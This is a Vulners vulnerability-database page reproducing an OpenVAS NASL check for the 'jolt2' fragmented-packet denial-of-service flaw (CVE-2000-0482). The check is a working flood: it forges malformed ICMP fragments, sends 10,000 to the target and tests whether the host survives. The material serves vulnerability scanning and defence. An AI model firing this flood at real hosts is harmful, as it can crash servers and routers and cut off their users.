Lucene search
K

jolt2

🗓️ 03 Nov 2005 00:00:00Reported by This script is Copyright (C) 2003 Michel ArboiType 
openvas
 openvas
🔗 plugins.openvas.org👁 30 Views

jolt2 denial of service attack description, crash when flooded with packets, patch contac

Related
Code
ReporterTitlePublishedViews
Family
CVE
CVE-2000-0482
13 Oct 200004:00
cve
Cvelist
CVE-2000-0482
13 Oct 200004:00
cvelist
EUVD
EUVD-2000-0481
7 Oct 202500:30
euvd
Tenable Nessus
TCP/IP IP Fragmentation Remote DoS (jolt2)
22 Oct 200300:00
nessus
NVD
CVE-2000-0482
6 Jun 200004:00
nvd
OpenVAS
'jolt2' DoS Vulnerability - Active Check
3 Nov 200500:00
openvas
CERT
IP Fragmentation Denial-of-Service Vulnerability in FireWall-1
26 Sep 200000:00
cert
# OpenVAS Vulnerability Test
# $Id: jolt2.nasl 8144 2017-12-15 13:19:55Z cfischer $
# Description: jolt2
#
# Authors:
# Michel Arboi <[email protected]>
#
# Copyright:
# Copyright (C) 2003 Michel Arboi
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 2,
# as published by the Free Software Foundation
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
#

tag_summary = "The machine (or a gateway on the network path) crashed when
flooded with incorrectly fragmented packets.
This is known as the 'jolt2' denial of service attack.

An attacker may use this flaw to shut down this server or router,
thus preventing you from working properly.";

tag_solution = "contact your operating system vendor for a patch.";

# Note: the original exploit looks buggy. I tried to reproduce it here.

if(description)
{
 script_id(11902);
 script_version("$Revision: 8144 $");
 script_tag(name:"last_modification", value:"$Date: 2017-12-15 14:19:55 +0100 (Fri, 15 Dec 2017) $");
 script_tag(name:"creation_date", value:"2005-11-03 14:08:04 +0100 (Thu, 03 Nov 2005)");
 script_bugtraq_id(1312);
 script_tag(name:"cvss_base", value:"5.0");
 script_tag(name:"cvss_base_vector", value:"AV:N/AC:L/Au:N/C:N/I:P/A:N");
 script_cve_id("CVE-2000-0482");

 name = "jolt2";
 script_name(name);
 

 script_category(ACT_FLOOD);
  script_tag(name:"qod_type", value:"remote_vul");
 script_copyright("This script is Copyright (C) 2003 Michel Arboi");
 family = "Denial of Service";
 script_family(family);

 script_tag(name : "solution" , value : tag_solution);
 script_tag(name : "summary" , value : tag_summary);

 script_exclude_keys("keys/TARGET_IS_IPV6");
 exit(0);
}

#

if(TARGET_IS_IPV6())exit(0);

src = this_host();
id = 0x455;
seq = rand() % 256;

ip = forge_ip_packet(ip_v: 4, ip_hl : 5, ip_tos : 0, ip_len : 20+8+1,
		     ip_id : id, ip_p : IPPROTO_ICMP, ip_ttl : 255,
		     ip_off : 8190, ip_src : src);

icmp = forge_icmp_packet(ip:ip, icmp_type:8, icmp_code:0,
	     		 icmp_seq: seq, icmp_id:seq, data: "X");

start_denial();

send_packet(icmp, pcap_active: 0) x 10000;

alive = end_denial();
if(!alive)
{
	security_message();
	set_kb_item( name:"Host/dead", value:TRUE );
}

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

15 Dec 2017 00:00Current
6.5Medium risk
Vulners AI Score6.5
EPSS0.06131
30